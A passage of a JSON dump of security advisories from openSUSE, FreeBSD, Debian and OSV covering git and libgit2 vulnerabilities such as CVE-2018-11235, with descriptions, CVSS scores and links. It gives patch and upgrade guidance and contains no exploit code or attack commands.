guiffy.\n * various other workflow improvements and fixes\n * performance improvements and other developer visible fixes\n\n git 2.17.1\n\n * Submodule \"names\" come from the untrusted .gitmodules file, but we\n blindly append them to $GIT_DIR/modules to create our on-disk repo\n paths. 
This means you can do bad things by putting \"../\" into the name.\n We now enforce some rules for submodule names which will cause Git to\n ignore these malicious names (CVE-2018-11235, bsc#1095219)\n * It was possible to trick the code that sanity-checks paths on NTFS into\n reading random piece of memory (CVE-2018-11233, bsc#1095218)\n * Support on the server side to reject pushes to repositories that attempt\n to create such problematic .gitmodules file etc. as tracked contents, to\n help hosting sites protect their customers by preventing malicious\n contents from spreading.\n\n git 2.17.0:\n\n * \"diff\" family of commands learned \"--find-object=<object-id>\" option to\n limit the findings to changes that involve the named object.\n * \"git format-patch\" learned to give 72-cols to diffstat, which is\n consistent with other line length limits the subcommand uses for its\n output meant for e-mails.\n * The log from \"git daemon\" can be redirected with a new option; one\n relevant use case is to send the log to standard error (instead of\n syslog) when running it from inetd.\n * \"git rebase\" learned to take \"--allow-empty-message\" option.\n * \"git am\" has learned the \"--quit\" option, in addition to the existing\n \"--abort\" option; having the pair mirrors a few other commands like\n \"rebase\" and \"cherry-pick\".\n * \"git worktree add\" learned to run the post-checkout hook, just like \"git\n clone\" runs it upon the initial checkout.\n * \"git tag\" learned an explicit \"--edit\" option that allows the message\n given via \"-m\" and \"-F\" to be further edited.\n * \"git fetch --prune-tags\" may be used as a handy short-hand for getting\n rid of stale tags that are locally held.\n * The new \"--show-current-patch\" option gives an end-user facing way to\n get the diff being applied when \"git rebase\" (and \"git am\") stops with a\n conflict.\n * \"git add -p\" used to offer \"/\" (look for a matching hunk) as a choice,\n even there was only one 
hunk, which has been corrected. Also the\n single-key help is now given only for keys that are enabled (e.g. help\n for '/' won't be shown when there is only one hunk).\n * Since Git 1.7.9, \"git merge\" defaulted to --no-ff (i.e. even when the\n side branch being merged is a descendant of the current commit, create a\n merge commit instead of fast-forwarding) when merging a tag object.\n This was appropriate default for integrators who pull signed tags from\n their downstream contributors, but caused an unnecessary merges when\n used by downstream contributors who habitually \"catch up\" their topic\n branches with tagged releases from the upstream. Update \"git merge\" to\n default to --no-ff only when merging a tag object that does *not* sit at\n its usual place in refs/tags/ hierarchy, and allow fast-forwarding\n otherwise, to mitigate the problem.\n * \"git status\" can spend a lot of cycles to compute the relation between\n the current branch and its upstream, which can now be disabled with\n \"--no-ahead-behind\" option.\n * \"git diff\" and friends learned funcname patterns for Go language source\n files.\n * \"git send-email\" learned \"--reply-to=<address>\" option.\n * Funcname pattern used for C# now recognizes \"async\" keyword.\n * In a way similar to how \"git tag\" learned to honor the pager setting\n only in the list mode, \"git config\" learned to ignore the pager setting\n when it is used for setting values (i.e. 
when the purpose of the\n operation is not to \"show\").\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-598=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-01T00:00:00", "type": "suse", "title": "Security update for git (moderate)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15298", "CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456", "CVE-2019-1348", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1351", "CVE-2019-1352", "CVE-2019-1353", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-19604", "CVE-2020-11008", "CVE-2020-5260"], "modified": "2020-05-01T00:00:00", "id": "OPENSUSE-SU-2020:0598-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/VP5YOKSRLMTVAPQKPHEDGCOIZL5JKJW5/", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:31", "description": "\n\nThe Git community reports:\n\nOut-of-bounds reads when reading objects from a packfile\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.2}, "published": "2018-07-09T00:00:00", "type": "freebsd", "title": "Libgit2 -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888"], "modified": "2018-07-09T00:00:00", "id": "3C9B7698-84DA-11E8-8C75-D8CB8ABF62DD", "href": "https://vuxml.freebsd.org/freebsd/3c9b7698-84da-11e8-8c75-d8cb8abf62dd.html", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-01-19T15:51:31", "description": "\n\nThe Git community reports:\n\nInsufficient validation of submodule names\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", 
"userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "freebsd", "title": "Libgit2 -- Fixing insufficient validation of submodule names", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-05-29T00:00:00", "id": "5A1589AD-68F9-11E8-83F5-D8CB8ABF62DD", "href": "https://vuxml.freebsd.org/freebsd/5a1589ad-68f9-11e8-83f5-d8cb8abf62dd.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T15:51:31", "description": "\n\nThe Git community reports:\n\nIn affected versions of Git, code to sanity-check pathnames on\n\t NTFS can result in reading out-of-bounds memory.\nIn affected versions of Git, remote code execution can\n\t occur. With a crafted .gitmodules file, a malicious project can\n\t execute an arbitrary script on a machine that runs \"git clone\n\t --recurse-submodules\" because submodule \"names\" are obtained from\n\t this file, and then appended to $GIT_DIR/modules, leading to\n\t directory traversal with \"../\" in a name. 
Finally, post-checkout\n\t hooks from a submodule are executed, bypassing the intended design\n\t in which hooks are not obtained from a remote server.\n\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "freebsd", "title": "Git -- Fix memory out-of-bounds and remote code execution vulnerabilities (CVE-2018-11233 and CVE-2018-11235)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2018-05-29T00:00:00", "id": "C7A135F4-66A4-11E8-9E63-3085A9A47796", "href": "https://vuxml.freebsd.org/freebsd/c7a135f4-66a4-11e8-9e63-3085a9a47796.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2022-03-26T20:13:20", "description": "Package : libgit2\nVersion : 0.21.1-3+deb8u1\nCVE ID : CVE-2018-10887 CVE-2018-10888 CVE-2018-15501\n\n\nCVE-2018-15501\n A potential out-of-bounds read when processing a "ng" smart packet\n might lead to a Denial of Service.\n\nCVE-2018-10887\n A flaw has been discovered that may lead to an integer overflow which\n in turn leads to an out of bound read, allowing 
to read before the\n base object. This might be used to leak memory addresses or cause a\n Denial of Service.\n\nCVE-2018-10888\n A flaw may lead to an out-of-bound read while reading a binary delta\n file. This might result in a Denial of Service.\n\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n0.21.1-3+deb8u1.\n\nWe recommend that you upgrade your libgit2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2018-08-25T21:27:14", "type": "debian", "title": "[SECURITY] [DLA 1477-1] libgit2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501"], "modified": "2018-08-25T21:27:14", "id": "DEBIAN:DLA-1477-1:EAB94", "href": "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-11-29T22:33:35", "description": "- 
-------------------------------------------------------------------------\nDebian Security Advisory DSA-4212-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 29, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : git\nCVE ID : CVE-2018-11235\n\nEtienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1:2.1.4-2.1+deb8u6.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u3.\n\nWe recommend that you upgrade your git packages.\n\nFor the detailed security status of git please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/git\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T20:44:01", "type": "debian", "title": "[SECURITY] [DSA 4212-1] git security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-05-29T20:44:01", "id": "DEBIAN:DSA-4212-1:9B5AE", "href": "https://lists.debian.org/debian-security-announce/2018/msg00140.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T18:52:45", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4212-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 29, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : git\nCVE ID : CVE-2018-11235\n\nEtienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1:2.1.4-2.1+deb8u6.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u3.\n\nWe recommend that you upgrade your git packages.\n\nFor the detailed security status of git please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/git\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T20:44:01", "type": "debian", "title": "[SECURITY] [DSA 4212-1] git security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-05-29T20:44:01", "id": "DEBIAN:DSA-4212-1:81E13", "href": "https://lists.debian.org/debian-security-announce/2018/msg00140.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T02:18:12", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2936-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Utkarsh Gupta\nMarch 07, 2022 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : libgit2\nVersion : 0.25.1+really0.24.6-1+deb9u1\nCVE ID : CVE-2018-8098 CVE-2018-8099 CVE-2018-10887 CVE-2018-10888\n CVE-2018-15501 CVE-2020-12278 CVE-2020-12279\nDebian Bug : 892961 892962 903508 903509\n\nMultiple vulnerabilities were found in libgit2, a low-level Git library,\nand are as follows:\n\nCVE-2018-8098\n\n Integer overflow in the index.c:read_entry() function while\n decompressing a compressed prefix length in libgit2 before\n v0.26.2 allows an attacker to cause a denial of service\n 
(out-of-bounds read) via a crafted repository index file.\n\nCVE-2018-8099\n\n Incorrect returning of an error code in the index.c:read_entry()\n function leads to a double free in libgit2 before v0.26.2, which\n allows an attacker to cause a denial of service via a crafted\n repository index file.\n\nCVE-2018-10887\n\n It has been discovered that an unexpected sign extension in\n git_delta_apply function in delta-apply.c file may lead to an\n integer overflow which in turn leads to an out of bound read,\n allowing to read before the base object. An attacker may use\n this flaw to leak memory addresses or cause a Denial of Service.\n\nCVE-2018-10888\n\n A missing check in git_delta_apply function in delta-apply.c file,\n may lead to an out-of-bound read while reading a binary delta file.\n An attacker may use this flaw to cause a Denial of Service.\n\nCVE-2018-15501\n\n In ng_pkt in transports/smart_pkt.c in libgit2, a remote attacker\n can send a crafted smart-protocol "ng" packet that lacks a '\\0'\n byte to trigger an out-of-bounds read that leads to DoS.\n\nCVE-2020-12278\n\n path.c mishandles equivalent filenames that exist because of NTFS\n Alternate Data Streams. This may allow remote code execution when\n cloning a repository. This issue is similar to CVE-2019-1352.\n\nCVE-2020-12279\n\n checkout.c mishandles equivalent filenames that exist because of\n NTFS short names. This may allow remote code execution when cloning\n a repository. 
This issue is similar to CVE-2019-1353.\n\nFor Debian 9 stretch, these problems have been fixed in version\n0.25.1+really0.24.6-1+deb9u1.\n\nWe recommend that you upgrade your libgit2 packages.\n\nFor the detailed security status of libgit2 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/libgit2\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T00:39:43", "type": "debian", "title": "[SECURITY] [DLA 2936-1] libgit2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501", "CVE-2018-8098", "CVE-2018-8099", "CVE-2019-1352", "CVE-2019-1353", "CVE-2020-12278", "CVE-2020-12279"], "modified": "2022-03-21T00:39:43", "id": "DEBIAN:DLA-2936-1:BE105", "href": "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": 
"2022-07-06T05:27:58", "description": "\n* [CVE-2018-15501](https://security-tracker.debian.org/tracker/CVE-2018-15501)\nA potential out-of-bounds read when processing a ng smart packet\n might lead to a Denial of Service.\n* [CVE-2018-10887](https://security-tracker.debian.org/tracker/CVE-2018-10887)\nA flaw has been discovered that may lead to an integer overflow which\n in turn leads to an out of bound read, allowing to read before the\n base object. This might be used to leak memory addresses or cause a\n Denial of Service.\n* [CVE-2018-10888](https://security-tracker.debian.org/tracker/CVE-2018-10888)\nA flaw may lead to an out-of-bound read while reading a binary delta\n file. This might result in a Denial of Service.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n0.21.1-3+deb8u1.\n\n\nWe recommend that you upgrade your libgit2 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2018-08-25T00:00:00", "type": "osv", "title": "libgit2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501"], "modified": "2022-07-06T00:11:28", "id": "OSV:DLA-1477-1", "href": "https://osv.dev/vulnerability/DLA-1477-1", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-07-06T05:02:33", "description": "\nEtienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.\n\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1:2.1.4-2.1+deb8u6.\n\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u3.\n\n\nWe recommend that you upgrade your git packages.\n\n\nFor the detailed security status of git please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/git>\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "osv", "title": "git - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2022-07-06T03:10:41", "id": "OSV:DSA-4212-1", "href": "https://osv.dev/vulnerability/DSA-4212-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T05:18:58", "description": "\nMultiple vulnerabilities were found in libgit2, a low-level Git library,\nand are as follows:\n\n\n* [CVE-2018-8098](https://security-tracker.debian.org/tracker/CVE-2018-8098)\nInteger overflow in the index.c:read\\_entry() function while\n decompressing a compressed prefix length in libgit2 before\n v0.26.2 allows an attacker to cause a denial of service\n (out-of-bounds read) via a crafted repository index file.\n* [CVE-2018-8099](https://security-tracker.debian.org/tracker/CVE-2018-8099)\nIncorrect returning of an error code in the index.c:read\\_entry()\n function leads to a double free in libgit2 before v0.26.2, which\n allows an attacker to cause a denial of service via a crafted\n repository index file.\n* [CVE-2018-10887](https://security-tracker.debian.org/tracker/CVE-2018-10887)\nIt has been discovered that an unexpected sign extension in\n git\\_delta\\_apply function in delta-apply.c file may lead to an\n integer overflow which in turn leads to an out of bound read,\n allowing to read before the base object. 
An attacker may use\n this flaw to leak memory addresses or cause a Denial of Service.\n* [CVE-2018-10888](https://security-tracker.debian.org/tracker/CVE-2018-10888)\nA missing check in git\\_delta\\_apply function in delta-apply.c file,\n may lead to an out-of-bound read while reading a binary delta file.\n An attacker may use this flaw to cause a Denial of Service.\n* [CVE-2018-15501](https://security-tracker.debian.org/tracker/CVE-2018-15501)\nIn ng\\_pkt in transports/smart\\_pkt.c in libgit2, a remote attacker\n can send a crafted smart-protocol ng packet that lacks a '\\0'\n byte to trigger an out-of-bounds read that leads to DoS.\n* [CVE-2020-12278](https://security-tracker.debian.org/tracker/CVE-2020-12278)\npath.c mishandles equivalent filenames that exist because of NTFS\n Alternate Data Streams. This may allow remote code execution when\n cloning a repository. This issue is similar to [CVE-2019-1352](https://security-tracker.debian.org/tracker/CVE-2019-1352).\n* [CVE-2020-12279](https://security-tracker.debian.org/tracker/CVE-2020-12279)\ncheckout.c mishandles equivalent filenames that exist because of\n NTFS short names. This may allow remote code execution when cloning\n a repository. 
This issue is similar to [CVE-2019-1353](https://security-tracker.debian.org/tracker/CVE-2019-1353).\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n0.25.1+really0.24.6-1+deb9u1.\n\n\nWe recommend that you upgrade your libgit2 packages.\n\n\nFor the detailed security status of libgit2 please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/libgit2>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T00:00:00", "type": "osv", "title": "libgit2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501", "CVE-2018-8098", "CVE-2018-8099", "CVE-2019-1352", "CVE-2019-1353", "CVE-2020-12278", "CVE-2020-12279"], "modified": "2022-07-06T01:45:44", "id": "OSV:DLA-2936-1", "href": "https://osv.dev/vulnerability/DLA-2936-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], 
